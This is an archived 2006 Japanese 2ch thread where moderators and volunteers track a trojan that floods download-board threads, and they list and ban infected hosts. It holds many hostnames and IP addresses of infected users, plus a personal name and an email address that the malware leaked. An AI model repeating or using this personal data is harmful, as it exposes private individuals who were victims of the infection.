■ウィルス爆撃相談所&焼き処【RockBBQ】
■ このスレッドは過去ログ倉庫に格納されています
ここはウィルス等を利用した爆撃等の相談所です。
ウィルス感染ホストの報告と焼き処を兼ねます。
#削除依頼は、削除整理板へお願いします。
#ここでは芋掘りは行いません。専用スレでどうぞ。
【関連スレ】
【BBQ&BBM12本目】公開串登録所【ピンポイント規制】
http://qb5.2ch.net/test/read.cgi/sec2chd/1139102655/
bbs.cgi再開発プロジェクト7
http://qb5.2ch.net/test/read.cgi/operate/1130918407/ >>797 さすがにklistにこれだけ引っかかると(汗)
以下のルールで焼きましたー。
海外&逆引き不可:永久
20件以上:1month
5件以上:1week
1〜4件:1day >>798
お疲れ様ですー ありがとうございましたー
【nyreヲチ】▲▲▲▲砲撃傘▲▲▲▲21【常に上ゲ】
http://tmp6.2ch.net/test/read.cgi/download/1143095402/l50
埋まったので報告(無差別抽出です)
まず、逆引き不可から
60.222.181.101
222.214.131.41
211.51.39.2
222.129.102.32
125.171.28.162
59.34.212.82
58.24.92.143
218.109.122.63
211.190.234.163
58.148.33.134
61.242.117.184
220.173.126.94
218.19.163.125
222.241.203.35
222.188.146.95
222.87.26.36
219.129.11.166
60.216.196.166
222.217.119.176
61.172.156.137
211.58.1.247
60.171.15.157
211.91.108.197
222.104.214.18
60.16.68.18
222.170.43.158
222.69.216.129
202.103.137.129
220.176.151.39
218.27.65.39
61.233.187.49
221.127.43.179 次に、日本ドメイン
FLH1Aan054.isk.mesh.ad.jp
FLH1Aee021.tky.mesh.ad.jp
tetkyo078092.tkyo.te.ftth2.ppp.infoweb.ne.jp
tetkyo129023.tkyo.te.ftth2.ppp.infoweb.ne.jp
ntaich049253.aich.nt.ftth.ppp.infoweb.ne.jp
nttkyo386107.tkyo.nt.ftth.ppp.infoweb.ne.jp
actkyo125141.adsl.ppp.infoweb.ne.jp
61-26-44-228.rev.home.ne.jp
168.205.12.221.megaegg.ne.jp
112.82.168.203.megaegg.ne.jp
hccd37dcda4.bai.ne.jp
cb8a94-006.tiki.ne.jp
HKRbf114.nagasaki-ip.dti.ne.jp
220x151x166x153.ap220.ftth.ucom.ne.jp
p6003-ipad09otsu.shiga.ocn.ne.jp
p5188-adsau08doujib3-acca.osaka.ocn.ne.jp
p4033-ipbfp605osakakita.osaka.ocn.ne.jp
p4136-ipad02souka.saitama.ocn.ne.jp
p1014-ipbf201niho.hiroshima.ocn.ne.jp
p8134-ipad09imazuka.yamagata.ocn.ne.jp
p4081-adsau12honb1-acca.tokyo.ocn.ne.jp
KHP222000128013.ppp-bb.dion.ne.jp
ZK065115.ppp.dion.ne.jp
ZE056106.ppp.dion.ne.jp
ZQ236096.ppp.dion.ne.jp
ZB058219.ppp.dion.ne.jp
K157179.ppp.dion.ne.jp
zaq3a558e4e.zaq.ne.jp
ppxa238.enth.cli.wbs.ne.jp
i61-195-251-187.us.catvmics.ne.jp
p6faad9.tokynt01.ap.so-net.ne.jp
60-56-66-32.eonet.ne.jp
59-190-85-172.eonet.ne.jp
191184211203user.viplt.ne.jp
family.e-catv.ne.jp
adsl-west-9704.enjoy.ne.jp
187.81.111.219.dy.bbexcite.jp
i60-36-65-55.s04.a031.ap.plala.or.jp
i220-109-150-139.s05.a034.ap.plala.or.jp
139.85.44.61.ap.gmo-access.jp
次に、.netドメイン
c-125-139.e-awa.net
softbank219015020130.bbtec.net
softbank218127020023.bbtec.net
softbank220019128183.bbtec.net
softbank219169020154.bbtec.net
softbank218112008046.bbtec.net
softbank221027156007.bbtec.net
softbank219026004227.bbtec.net
softbank219019192047.bbtec.net
softbank220024016067.bbtec.net
softbank219168254098.bbtec.net
softbank221023195139.bbtec.net
220-132-179-207.HINET-IP.hinet.net
59-112-164-165.dynamic.hinet.net
caae329d.fla.ycix.net
次に.comドメイン
059148114240.ctinets.com
次に海外ドメイン(台湾、イギリス)
61-71-72-68.adsl.static.giga.net.tw
221-169-61-129.adsl.static.seed.net.tw
82-71-53-185.dsl.in-addr.zen.co.uk
以上です。前回より逆引き不可が増えた気がします。あとソフトバンク増えすぎ >>797
family.e-catv.ne.jp 59件 -> 共有ホスト 【winny】うp研復活!TBSがファイル交換推奨【闇】
http://tmp6.2ch.net/test/read.cgi/download/1142461155/787
>787 名前: [名無し]さん(bin+cue).rar [sage] 投稿日: 2006/03/26(日) 23:06:28 ID:NrQVad+W0
> (アニソン) ヴァンドレッド ED[SiLC-himegoto].mp3,,0,0,79daa1562ae4080938f4cedc88b7a9f0,1
これ・・・
数年前にshinbiroから落としたからイラネ
【DSBL】PROXY規制中!【報告無用】39
http://qb5.2ch.net/test/read.cgi/sec2chd/1143184461/25-26
解決済みだったか。 >>800-802 海外と逆引き不可はさっくりと永久で。
そして爆撃がやけに多いp8134-ipad09imazuka.yamagata.ocn.ne.jpも短期で。 >>797の続きですー(3/26 13:41:35〜3/27 07:03:44)
112.82.168.203.megaegg.ne.jp 138件(>>801で報告)
FLH1Aan054.isk.mesh.ad.jp 37件(>>797,>>801とかで報告)
ntaich049253.aich.nt.ftth.ppp.infoweb.ne.jp 8件(>>801で報告)
zaq3a559766.zaq.ne.jp 6件
ZR077221.ppp.dion.ne.jp 6件
45.227.192.61.east.flets.alpha-net.ne.jp 4件
221.221.211.45 4件
222.170.43.158 3件(>>800で報告)
ZB058219.ppp.dion.ne.jp 2件(>>801で報告)
y077201.ppp.dion.ne.jp 1件
>>808
既に焼かれていたもの以外は処理しましたー >>810
お疲れ様ですー ありがとうございましたー 【Winny】エッチな4610のコンプを目指すスレ
ttp://tmp6.2ch.net/test/read.cgi/download/1143282788
「KaZaA…Shareaza…eMule…DC++…etc.」【XX】
ttp://tmp6.2ch.net/test/read.cgi/download/1136172490
[Winny Share] [DVDISO](18禁アニメ) Part.1
ttp://tmp6.2ch.net/test/read.cgi/download/1138684813
の3つのスレに 「金曜のウィルスと同様の内容」を 「age」 で連続書込みが発生しています。
感染者(?)はひとり(IDは1つ)のみですが、金曜のヤツの亜種かもしれません。
増えたら大変そうです。
22:00 頃より3スレにほぼ均等に書込まれていて、既に合計120にもなっています。
ウィルスかどうかは判りませんが、気になるので報告しておきます。
>>812 の捕捉
age での書込IDが増えました。現在は2IDによる書き込みが行われています Share プラグイン・ツール総合 14.dll
ttp://tmp6.2ch.net/test/read.cgi/download/1137856068/
爆撃が始まりました >>813 の続報
本日(昨日22:00)登場の爆撃は blank age ですが、スレが埋まった後、次のスレに取り憑きました。
金曜日のとは挙動が異なります。
ttp://tmp6.2ch.net/test/read.cgi/download/1136172490
↑が埋まって↓に移動
ttp://tmp6.2ch.net/test/read.cgi/download/1137856068
【流出】トレンドマイクロ製品の営業資料など
http://live22x.2ch.net/test/read.cgi/news/1143324325/
ノートンで侵入者警報が出て再起動しないとν速を更新できなくなります >>808の続きですー(3/27 20:24:03〜3/28 09:53:29)
O002196.ppp.dion.ne.jp 119件
softbank221079141136.bbtec.net 11件
softbank219018116093.bbtec.net 6件
ZD009040.ppp.dion.ne.jp 6件
softbank221032112026.bbtec.net 3件
EATcf-579p70.ppp15.odn.ne.jp 3件
i218-44-109-215.s02.a043.ap.plala.or.jp 3件
ntkuch007202.kuch.nt.adsl.ppp.infoweb.ne.jp 2件
ntkmmt034174.kmmt.nt.ftth.ppp.infoweb.ne.jp 2件
softbank221040073014.bbtec.net 1件
KHP059139060172.ppp-bb.dion.ne.jp 1件 download 222.148.149.196 (p2196-ipbf202toyamahon.toyama.ocn.ne.jp) 90
バーボンに引っかかってたやつ download 211.11.88.246 (p4246-ipbf1011marunouchi.tokyo.ocn.ne.jp) 20 特に防御装甲バーボンのリストを報告しても何もない、はず。
ポートスキャンでhackでもしたら報告すれば良い。 えーと、ウイルス本体の検出状況とかはどうなってるんでしょー。
本体は見つかってるのかなー。 ダウソ板の埋め立て爆撃は
winny、shareのスレタイを古い順に襲ってる? >>823
(一般コミック・雑誌) [ジャンプ] [2006-17] DEATH NOTE 102 我慢.zip 9,552,344 817dac31436ec7b1f381b7ffba69b502
の中身が
Desuno102 .scr
Thums.db 進路予想貼ってる人がいるけど、コピペした方がいいのかな?
もう把握済み? >>818の続きですー(3/28 10:48:09〜3/29 12:58:11)
「Hit word」まだぁ〜、日本語でok、すべては無知な
softbank219049078102.bbtec.net 81件
aic9-p205.flets.hi-ho.ne.jp 41件
p1054-ipbfp01kagawa.kagawa.ocn.ne.jp 4件
ntkuch007202.kuch.nt.adsl.ppp.infoweb.ne.jp 1件
KHP059139060172.ppp-bb.dion.ne.jp 1件
>>823
お疲れ様ですー
「ダウン板小泉ウィルス(仮称)対策室」
http://aa5.2ch.net/test/read.cgi/nanmin/1142776192/
こちらの皆さんが書かれているようにスレタイからターゲット
となるスレを選んでいるようですー
ウィルス名は「Trojan.Kakkeys.D」でその亜種・新種については
不明のようですー >>828
どのタイプの書き込みがどれとかー、そういう整理は出来て
るんでしょうかねー。
そういうのを整理してくれると、どれが未決なのかとか判るんですがー。
アンチウイルスソフトの会社に本体送ってくれてる人とか、
連絡とれないですかねー。
他の方でもいいんですがー、そういう捜索&通報部隊と
情報整理してくれる人はいないかなーと。
鯖側の対応はroot ★さんとかが考えてくれますけどー、
それと平行して、発生源も潰していかないといけないなーと。
必要ならキャップも発行してもらえるよーに管理人さんにも
お願いするつもりでいますー。 >>818
焼きましたー。
続いて>>831行きまーす。 >>831
既に焼かれていたもの以外は焼きましたー。
おつかれさまです。 >>832
>他の方でもいいんですがー、そういう捜索&通報部隊と
>情報整理してくれる人はいないかなーと。
ここの板にスレ立ててください。 >>832
つ ttp://aa5.2ch.net/test/read.cgi/nanmin/1142776192/
ではだめなの? >>836
このスレに最初に「相談所」と付けたのは、一応これも想定してたんですー。
>>838
えーと、まとめ役とかそーゆー人が欲しいんですがー。
実際に探してきてくれる人とかは、勿論誰でもいいんですがー、
ウイルスだと認識したはいーけど、本体を送らないと
アンチウイルスソフトの会社は対応してくれない&できないわけでー。
これは危険だって情報交換はそこでやられてますけどー、
そういう部分をとりまとめてほしーなーと。
でないとー、そのスレを見た限られた人達は対応できてもー、
2ちゃんねるも見たことがないよーな人たちには意味がないんですよねー。
プロバイダへの通報って方向性も探ってますがー、Antinny騒ぎで
ウイルスソフトへの関心も増えてますから、まーそちらから攻める
方向性もあったらいーかなーと。
やってもいいなーという人がいたら、ここで宣言でもメールでも
いーんで連絡いただければー。 >>839
【同人誌】[Twinbunny(橘りうた)] Platonic Maiden(C68)[ローゼンメイデン](稀少).zip,,0,0,189cd80e2ff859f9c3ed855b7f77dd81,0,1,1
に 〜.exe が入ってて SymantecAntiVirus では〜として検出される
2chへは ny とついたスレに爆撃する
とか
(アルバム)[2006.02.01] hiro 「寛 スペシャル・ボックス」(全26曲 192k).zip,,0,0,e7d3116a6f77209e3f2370ab352951d9,0,1,1
に 〜.exe が入ってるけど SymantecAntiVirus では検出されない
2chへは winnyと付いている古いスレから爆撃
のようなまとめが必要なんだろうか?
ここに書いたやつは確実にウィルスが入ってます。 (2chへは被害無し) 2006/03/28 00:00以降無差別 まさしく外道
203.156.237.245 2 res ID:GCajYsnT0
61.177.25.157 1 res ID:YP1h0JJL0
220.173.159.3 3 res ID:+jHlQITo0
124.63.237.234 2 res ID:8igAYUgB0
211-74-8-174.adsl.dynamic.seed.net.tw 1 res ID:kLrhjFA10
218.20.60.202 1 res ID:pzqmLH2e0
152.21.66.223 1 res ID:JFiUe8C+0
203.64.236.186 1 res ID:bxanW8IL0
58.34.163.168 1 res ID:kXQdUqXI0
222.87.85.93 1 res ID:fWa/95cn0
58.53.62.183 1 res ID:rSC0bB5C0
202.103.217.204 2 res ID:IpUDAlgL0
222.68.131.38 1 res ID:OdYxMbqF0
219.128.84.59 2 res ID:V/zjBYD10
58.227.42.130 2 res ID:sOEEygw40
218-161-5-109.dynamic.hinet.net 1 res ID:AUmMWxHU0
218.18.34.159 1 res ID:24RsWlIM0
61.172.156.126 2 res ID:2AbfdOaQ0
211.218.221.105 1 res ID:wquzN4Ad0
125.131.107.253 1 res ID:oVH9UxQh0
59-112-232-5.dynamic.hinet.net 3 res ID:vCrObFv20
221.234.210.201 5 res ID:fA9iOjhs0
203-70-99-71.adsl.dynamic.seed.net.tw 1 res ID:gbpeLLls0
d150-138-213.home.cgocable.net 1 res ID:9+GmE27E0
59-112-169-252.dynamic.hinet.net 1 res ID:RiJL1e1S0
203-70-98-81.adsl.dynamic.seed.net.tw 1 res ID:3ornWeT00 ___
_ /: : : : : ̄:`ー、
/: : : : : : : : : : : \_
_/: : : :/ /:∧ヽ ヽヽ: :\: : } `==、
. /: :/: /: /: /: |u |:ヽ: ヽ:ヽ: : .}: :| ト、: :〉|
/: :/: /: /: /|: :| .∧Lュ___,ノヽ: :|: |ミいV_∧
|: /|: :/: /__レ'V / リ ヽ|\V: :∧.ハ Vヘ: |
V: :|: /: 「 ∨ ___ レくヽ.| V | |:|
/: ∧|: : :ハ __ " ̄ ̄` |: レ' |/ レ
|:./ |:/人|:.|./ ̄ ` /:/:.|: | /
V ∨ |`| /:/: _ /|: / 〆
\. |: :|〉、__ <_ノ _ /|/レへ、
ヽヽ. `|V /  ̄「_フ^「__,/|/__ 」
. レ'∨ ヽ / /_从‐く| / | ゝ
 ̄`ー-、./じVー|V |_/ | ゝ
/ └┘ | ̄ ̄ ̄│
| .| |
http://tmp6.2ch.net/test/read.cgi/download/1143041017/29 2006/03/23 00:24:34 ID:1D3Vestf0
http://tmp6.2ch.net/test/read.cgi/download/1143112518/27 2006/03/23 20:16:09 ID:1D3Vestf0
http://tmp6.2ch.net/test/read.cgi/download/1143212713/27 2006/03/25 00:07:25 ID:71njDhma0
http://tmp6.2ch.net/test/read.cgi/download/1143447574/994 2006/03/28 00:22:46 ID:xPpLYRfy0
http://tmp6.2ch.net/test/read.cgi/download/1143528373/20 2006/03/28 15:47:46 ID:f7qJkRne0
http://tmp6.2ch.net/test/read.cgi/download/1143543516/67 2006/03/28 20:02:25 ID:f7qJkRne0
コピペ多すぎな板だった md5 : 7a9005d6b6db4d0f1a635148101f7431 size : 119
679 名前:[名無し]さん(bin+cue).rar [sage] 投稿日:2006/03/26 15:48:52 ID:M2KAVwPx0
(DVDISO) ドラゴンボールGT DRAGON BALLGT DVD-BOX DISC08(一層化+rr3%).part1.rar,,0,0,580e3d0aaff2a31144c00ab0603c886d,1
http://tmp6.2ch.net/test/read.cgi/download/1142461155/679 2006/03/26 15:48:52 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1143282788/230 2006/03/26 20:14:38 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1142461155/845 2006/03/27 02:03:20 ID:od84BWko0
http://tmp6.2ch.net/test/read.cgi/download/1142616654/306 2006/03/27 02:03:55 ID:od84BWko0
http://tmp6.2ch.net/test/read.cgi/download/1142512174/557 2006/03/27 22:20:04 ID:od84BWko0
http://tmp6.2ch.net/test/read.cgi/download/1142512174/723 2006/03/28 05:41:55 ID:VcGUx4vp0
md5 : 5eec148f09ba4f1c16b3095051daee58 size : 119
677 名前:[名無し]さん(bin+cue).rar [sage] 投稿日:2006/03/26 15:47:15 ID:M2KAVwPx0
(DVDISO) ドラゴンボールGT DRAGON BALLGT DVD-BOX DISC01(一層化+rr3%).part2.rar,,0,0,5e85b73cd8ea9815449e894431617cb8,1
http://tmp6.2ch.net/test/read.cgi/download/1142461155/677 2006/03/26 15:47:15 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1143282788/164 2006/03/26 15:41:49 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1143282788/233 2006/03/26 20:16:17 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1142616654/367 2006/03/27 18:08:35 ID:od84BWko0
md5 : b90f3f20c575dc244c2b6b5dfad21c28 size : 119
674 名前:[名無し]さん(bin+cue).rar [sage] 投稿日:2006/03/26 15:45:34 ID:M2KAVwPx0
(DVDISO) ドラゴンボールGT DRAGON BALLGT DVD-BOX DISC03(一層化+rr3%).part4.rar,,0,0,2802730479e8cf5238571b1a41366e5d,1
http://tmp6.2ch.net/test/read.cgi/download/1142461155/674 2006/03/26 15:45:34 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1143282788/389 2006/03/27 18:15:49 ID:od84BWko0
http://tmp6.2ch.net/test/read.cgi/download/1142616654/379 2006/03/27 18:18:31 ID:od84BWko0
http://tmp6.2ch.net/test/read.cgi/download/1142616654/466 2006/03/27 22:22:14 ID:od84BWko0
追跡は可能かも
ログ堀して一人ずつ潰していく? md5 : 342a69ff201c47d240cd742ad5e86800 size : 10
904 名前:[名無し]さん(bin+cue).rar [sage] 投稿日:2006/03/24 13:04:46 ID:oQXQ0MP20
ベ・ユミ
http://tmp6.2ch.net/test/read.cgi/download/1139757423/904 2006/03/24 13:04:46 ID:oQXQ0MP20
http://tmp6.2ch.net/test/read.cgi/download/1139757423/916 2006/03/24 13:12:49 ID:oQXQ0MP20
http://tmp6.2ch.net/test/read.cgi/download/1143282788/405 2006/03/27 19:12:57 ID:89F0Ckea0
http://tmp6.2ch.net/test/read.cgi/download/1142616654/599 2006/03/28 13:40:32 ID:qnvydZVs0
http://tmp6.2ch.net/test/read.cgi/download/1142512174/760 2006/03/28 13:46:26 ID:qnvydZVs0
フタコイオルタナティブのOP探してるっぽい
ID:52Zu+vUA0 は今日かかったっぽい
欲張りすぎ
http://tmp6.2ch.net/test/read.cgi/download/1140965580/355 2006/03/29 17:20:49 ID:52Zu+vUA0
【HIPHOP】【Album】2003.09.23-Outkast - Speakerboxxx The Love Below(2枚組).zip.mp3,,0,0,cf053922da4abf6e5e8a3b4ab726e9c9,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/315 2006/03/29 17:21:28 ID:52Zu+vUA0
【HIPHOP】【シングル】【洋楽】2pac & snoop doggy dog - hypnotize (remix).mp3,,0,0,d578cc0b37ee48ed94abe39ce0ba3d59,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/362 2006/03/29 17:23:27 ID:52Zu+vUA0
【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/322 2006/03/29 17:24:06 ID:52Zu+vUA0
[Album][Jazz]Erroll Garner - 1944-1945.zip.mp3,,0,0,33d1bf5f18d12eb7d1297d67a9a94a2f,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/370 2006/03/29 17:26:05 ID:52Zu+vUA0
(アニメサントラ)機動警察パトレイバー PATLABOR CDBOX DELUXE(3Discs).zip,,0,0,652fcd02de0016aca2d61c2ed33359c4,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/329 2006/03/29 17:26:44 ID:52Zu+vUA0
(一般コミック・雑誌) [マガジン] [2005-18] [瀬尾公治] 涼風-SUZUKA- No.055.zip,,0,0,8c4f5d9231bec0ffe2d3b29ea06ddb88,1
↓つづく http://tmp6.2ch.net/test/read.cgi/download/1141337563/350 2006/03/29 17:34:38 ID:52Zu+vUA0
(一般コミック) (み) [美樹本晴彦] 機動戦士ガンダム Ecole du Ciel -天空の学校- 第04巻.zip,,0,0,f92fab399960196555649c9c14c5b22f,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/357 2006/03/29 17:37:16 ID:52Zu+vUA0
[ALBUM]Fantastic Plastic Machine - Les Plus.zip,,0,0,d9b110c415aef07b87e201101b2d18b5,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/364 2006/03/29 17:39:54 ID:52Zu+vUA0
[sports] 【フィギュアスケート】 Sarah Hughes 2002 Olys Ex - Youl'll Never Walk Alone.wmv,,0,0,f398cffb5eb091449c2e867a1f47dc27,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/413 2006/03/29 17:41:54 ID:52Zu+vUA0
【HIPHOP】【Album】2003.09.23-Outkast - Speakerboxxx The Love Below(2枚組).zip.mp3,,0,0,cf053922da4abf6e5e8a3b4ab726e9c9,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/371 2006/03/29 17:42:33 ID:52Zu+vUA0
【HIPHOP】【シングル】【洋楽】2pac-I Wonder If Heaven Got a Ghetto(Hiphop Instrumental).mp3,,0,0,3fece601f150a1807cb244489124ae3f,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/421 2006/03/29 17:44:32 ID:52Zu+vUA0
加藤登紀子 - 時には昔の話を(久石譲 - 紅の豚).mp3,,0,0,220e0d02c04514d73bbc78f071f23ae7,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/378 2006/03/29 17:45:11 ID:52Zu+vUA0
[Album][Jazz]Erroll Garner - 1944-1945.zip.mp3,,0,0,33d1bf5f18d12eb7d1297d67a9a94a2f,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/385 2006/03/29 17:47:49 ID:52Zu+vUA0
(お宝) 杏さゆり 迫力の巨乳.jpg.lzh,,0,0,c59d552d5da3efa271471b0a4494894f,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/436 2006/03/29 17:49:48 ID:52Zu+vUA0
【HIPHOP】【シングル】【洋楽】2pac & snoop doggy dog - hypnotize (remix).mp3,,0,0,d578cc0b37ee48ed94abe39ce0ba3d59,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/444 2006/03/29 17:52:27 ID:52Zu+vUA0
img20031223002421 杏さゆり 超絶お尻(2).jpg.lzh,,0,0,ccbb8fcef6cd0b1deedcf5303ce5cc16,1 24日のウイルスの亜種だったようです。ついにプロバイダーが動くに対してfusiana投稿しました。
ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/228
228 :0 p3201-ipad01sasajima.aichi.ocn.ne.jp :2006/03/29(水) 23:06:04 ID:n8nXqcE30
佐藤 貴之
以下省略
【Share】国内ドラマ専用スレPar11【ハイビジョン】
http://tmp6.2ch.net/test/read.cgi/download/1141357990/l50
トルコ風呂で皆既日食だって? 1703
http://tmp6.2ch.net/test/read.cgi/download/1143630933/l50
【野外露出】人ごみの中で全裸になる動画【Winny】4
http://tmp6.2ch.net/test/read.cgi/download/1141217092/l50
での投稿を確認しました。
(アニメ) 星方天使エンジェルリンクス 第09章 「良禽択木」 (LD 640x480 WMV9 QB93 120fps).avi,oos5qf7hrv,0,0,89f53b68715041cd3edad976b7792ef9,1
が落ちてこない・・・
ダウンロード板の爆撃種類
1.〜まだぁ〜? の爆撃 (書き込み内容が違う亜種有り)
2.>849 のようなやつ (亜種も?)
3.tab1.txt,tab2.txt,download.txtのファイル内容を一行ごと書き込む (Symantecからウィルス判定)
4.ほかにあったっけ? ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/235
235 :0 nissin45079.ccnw.ne.jp :2006/03/30(木) 00:13:15 ID:XXsBPx4M0
パピヨン:*eiryu04jp@hotmail.co.jp
以下省略
確認してませんが>>849と同じく暴れまわってると思われます。
・・・地方のCATVなのによりによって同じプロバの感染者を見るとは・・・
ちなみにこちらは↑の通り 参考までに
うちのプロバはなかなかホスト名が切り替わりません。MACを変更するとすぐにIPが変わりますが。
・・・あーあー自分のホスト名ばらしちゃったw 人探ししてるのに、ウイルスファイルの情報貼り付けてどうしたいんだろう。 なんだか、錯綜しているようだなぁー。
・ウイルス本体の検出状況とか
・どのタイプの書き込みがどれとかー、そういう整理
・で、どれが未決なのかとかの整理
など
をまとめてくれる人
をやれる人待ちのようで。
>>823>>832>>839
>やってもいいなーという人がいたら、ここで宣言でもメールでも
>いーんで連絡いただければー。 書類が揃ってないから対処しないお役所仕事のようですなw
ボランティアが大変なのもわかってはいますが、善意の通報者とボランティアとの間に
おかしな距離があるのが気になります。 事態はどんどん先に進んでいます。 > ・ウイルス本体の検出状況とか
現在発見されているウイルス(らしき物)は全て検出されます
> ・どのタイプの書き込みがどれとかー、そういう整理
ageタイプとsageタイプの2種類
ウイルス自体が違うのか環境によってagesage切り替えるのかは不明
ageタイプはスレタイが/winny|share|\d\d\d\d/iにマッチしdat番号が古いもの
sageタイプはスレタイが/winny|share/にマッチしdat番号が古いもの
に爆撃
> ・で、どれが未決なのかとかの整理
不明 うーん。情報整理をやるぞー、という人はいないのかなー。
そうすると、そういう情報まとめるスレなりをやはり別に作る
必要あるのかなー。そこに必要な情報を集約していくとかー。
>>855
心配してるのは情報の漏れとゆーか、そういう部分ですー。
通報漏れとかー。
アンチウイルスで検出できるものは、もう心配ないわけですがー、
(それを集めてきても意味はないですー。ユーザーへの注意喚起は
また別の話なのでー)、実際の所検出されるものがどーゆー荒らし方を
してるのかと(投稿パターンがわかれば、対応状況が整理できる)、
まだ本体が発見されてないものを、投稿開始時期から絞っていけるかなーと。
wikiに整理したらいーのかなー。投稿パターンごとにー。
>>856
どうもですー。
そういう感じのを、もっと個別に詳しく煮詰めていければなーと。 まとめを入れた報告あきらめたー。 人→1
現在は無差別のみ
裏でこそこそとやってるだけ あー、パターン毎にテンプレで整理すればいーのかなー。
例えばこんな感じー。亜種はどんどん区別するって感じでー。
【通称】 ●●● typeE
【爆撃開始時期】 2006/03/01
【投稿の特徴など】
・sageで書き込む
・○○.txtの内容をランダムに投稿
・一番上の○○というタイトルスレに投稿
・・・・
・・・・
【本体確認状況】 2006/3/12に確認(通報済み)
http://qb5.2ch.net/test/read.cgi/sec2chd/***********/256
【アンチウイルス検出状況】
Norton × ・・Torojan.TypeB
NOD ◎ ・・・・
・
・ わしもあきらめた。
複数のウィルス(迷惑プログラム含む)の投稿がどんどん混在していく状況では
apache の access_log でも見ないと判別不能だろうね。
名無しに出来る事は少ないよ。あの板にはおそらく妨害者も居るしね。 >>858,860
>>832
>必要ならキャップも発行してもらえるよーに管理人さんにも
>お願いするつもりでいますー。
って、言っていますしー。 マルチポスト失礼(対策スレにも書き込みました)
★ウイルス名
Trojan.Kakkeys.Dだと思う。発見日も米国時間で2006年3月23日だからまず間違いない。
http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-trojan.kakkeys.d.html
★通称: 未定(以下候補)
・徹也ウイルス ←投稿された内容
・スッポンウイルス ←一度くっつくと離れないから
・レイニー・ウイルス ←reとnyに雨のように降り注ぐので
・埋めルス ←どんどん埋め立てていくから
・アーシェスHiguchi ←レスの内容?
・腐海 ←腐海のようにどんどんスレを飲み込んでいくから
★症状(概要)
・2ちゃんねるダウンロード板に
イ)Winnyがインストールされているフォルダ内の、Tab1.txt、Tab2.txt、download.txtの内容
ロ)アドレス帳に登録されたアドレス、メッセンジャーに登録されたアドレス
ハ)PCに登録されたユーザー名
を書き込む
★症状(詳細)
A)スレを上げて書き込む
・スレタイに「Winny」を含む、一番古いスレ(dat番号が一番若い)
・スレタイに「Share」を含む、〃
・スレタイに四桁の算用数字を含む、〃
の条件を満たすスレに並行してレスを送る。内容は、イ)、ハ)
B)スレを下げて書き込む
・スレタイに「winny」を含む、一番古いスレ(dat番号が一番若い)
・スレタイに「share」を含む、〃
・スレタイに四桁の算用数字を含む、〃
の条件を満たすスレに並行してレスを送る。内容は、イ)、ハ)
C)fusianaして書き込む
ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/l50
に対してレスを送る。内容は、ロ)
頻度は、A) >> B) >> C)
★ウイルスの実体
・Share、Winny共に使用してないので分かりません。候補はいくつか上がってるようですが。
★各社の対応状況
・実体を特定してないので不明。ageが現れたのはsageが来たあとなので亜種の可能性もあり お忙しいところ申し訳ありませんー
昨日より同人板にもダウン板と近似タイプのage爆撃が発生している模様です
感染者のSearch.txtかDownload.txtの中身を投下
管理人が閲覧者に質問するスレ
http://comic6.2ch.net/test/read.cgi/doujin/1143633663/
【ステル鞠ア】朝倉/芹野パクリ検証スレ【パクラ小麦】
http://comic6.2ch.net/test/read.cgi/doujin/1108821254/
他
一覧の上にあるスレが爆撃受けてるかもです。 補足
・ageは大文字小文字関係なく書き込むか否かは不明
・「ny」や「re」だけではスルーしました。
・ユーザー側での対策法はありません。攻撃を事前に予測することは可能ですが
・subject.txtで1000を超えたことを判定しているようです。
空爆されたスレがsubject.txt上で999で止まったときに(実際には1000になった)、
dat落ちするまで次の攻撃対処に移動しなかったので間違いないです。
>>863
作者が調子に乗ってキーワード変えて他スレを爆撃し始めたのか、
ソースが流れてて誰かが改造して流したのか
人のいるところならいいが、過疎狙われるとヤバイ >>863
一番新しいスレと一番古いスレを攻撃してるっぽい
キーワードは「同人」と「スレ」が臭い。
板に糞スレ立てましたスマソ。
スレ 同人 スレ 同人 スレ 同人
http://comic6.2ch.net/test/read.cgi/doujin/1143698200/l50
投稿毎に番号入力を強制するようにはできないの?
多少面倒でも爆撃で埋められるよりはマシじゃん 今日は・・・
ID:UHc3otES0 205 res
2006/03/30 00:00:17 【album】【hiphop】 Nujabes - Metaphorical music.zip,,0,0,a12a1d14297d6b068c294782d07bbf28,1
2006/03/30 00:02:53 【HIPHOP】【シングル】【洋楽】HipHop Mix - Shyne Cam`Ron Eminem Aaliyah Timbaland Big Pun 504 Boys Bone Thugs Lil` Zane 112 Mya D-12 Jay -z 2 PAC NAS.mp3.mp3.mp3.mp3,,0,0,df1cf121662440442e4e89907377c3ac,1
2006/03/30 00:08:46 【HIPHOP】【シングル】【洋楽】Eminem with DMX Xzibit Ja Rule & 2Pac - Bitch Please III.lzh,,0,0,38c1900d951207a64f1de458bd4ffb05,1
2006/03/30 00:12:05 【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
2006/03/30 00:18:39 【HIPHOP】【シングル】【洋楽】REMIX---R&B.Hip-Hop Mix 2 - (Ja Rule Shaggy Destiny's Child Mya Next Ruff Endz Pink Jay-Z).mp3.lzh,,0,0,e11d113fa2a5d648d6544c12b2056608,1
